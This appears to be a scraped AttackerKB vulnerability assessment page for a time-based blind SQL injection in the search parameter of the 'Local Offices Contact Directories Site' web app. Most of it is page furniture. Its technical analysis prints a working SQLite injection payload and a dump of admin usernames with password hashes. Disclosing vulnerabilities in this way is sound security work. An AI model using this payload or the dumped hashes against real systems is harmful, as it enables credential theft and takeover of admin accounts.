Very High
CVE-nu11-100421
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(3 users assessed)Very High
(3 users assessed)Unknown
Unknown
Unknown
CVE-nu11-100421
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
The search parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app “Local Offices Contact Directories Site” (by oretnom23). The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account.
Add Assessment
Technical Analysis
There are ~65K fingerprintable versions of these in the wild
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
fool-CVE-nu11-100421
Vendor:
Description:
The search
parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app “Local Offices Contact Directories Site” (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account.
Payload:
--- Parameter: search (GET) Type: time-based blind Title: SQLite > 2.0 AND time-based blind (heavy query) Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||' ---
- dump
Table: admin_list [2 entries] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | | cblake | cd74fae0a3adf459f73bbf187607ccea | +----------+----------------------------------+
Reproduce:
Proof:
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueHigh
-
ExploitabilityVery High
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportAdditional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Yeah, and it is horrible.
BR